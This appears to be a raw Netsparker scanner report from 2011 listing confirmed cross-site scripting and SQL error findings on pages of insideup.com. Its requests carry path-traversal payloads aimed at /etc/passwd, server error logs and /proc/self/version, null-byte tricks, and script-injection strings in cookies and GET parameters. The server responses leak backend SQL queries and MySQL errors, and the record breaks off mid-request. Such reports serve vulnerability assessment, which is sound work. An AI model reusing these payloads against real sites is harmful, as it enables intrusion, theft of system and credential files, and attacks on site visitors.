OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9f6g2uhuoqhnvgvkgh2llkd8p0; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005F3)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/dima00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005F5)%3C/script%3E

/ppc/leadflow/dima00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005F5)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/dima00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0005F5)</script>

Request

GET /ppc/leadflow/dima00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005F5)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9aepacs16qh1u756qhjbf0os42; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/'"--></style></script><script>netsparker(0x0005F5)</script>' OR prj.project_page_url = 'leadflow/dima00/'"--></style></script><script>netsparker(0x0005F5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/'"--></style></script><script>netsparker(0x0005F5)</script>' OR prj.project_page_url = 'leadflow/dima00/'"--></style></script><script>netsparker(0x0005F5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/'"--></style></script><script>netsparker(0x0005F5)</script>' OR prj.project_page_url = 'leadflow/dima00/'"--></style></script><script>netsparker(0x0005F5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/'"--></style></script><script>netsparker(0x0005F5)</script>' OR prj.project_page_url = 'leadflow/dima00/'"--></style></script><script>netsparker(0x0005F5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/'"--></style></script><script>netsparker(0x0005F5)</script>' OR prj.project_page_url = 'leadflow/dima00/'"--></style></script><script>netsparker(0x0005F5)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005F5)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lodi00/project.php

/ppc/leadflow/lodi00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x0005F6)</script>
iusrc GET iupsc

Request

GET /ppc/leadflow/lodi00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005F6)%3C/script%3E&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=j57biq15rjkv24d3727vin1dt0; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='"--></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='"--></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='"--></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='"--></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='"--></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='"--></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='"--></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='"--></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='"--></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='"--></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc/' union sel' at line 5
- /ppc/leadflow/parl00/project.php

/ppc/leadflow/parl00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x0005F7)</script>
iusrc GET iupsc

Request

GET /ppc/leadflow/parl00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005F7)%3C/script%3E&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 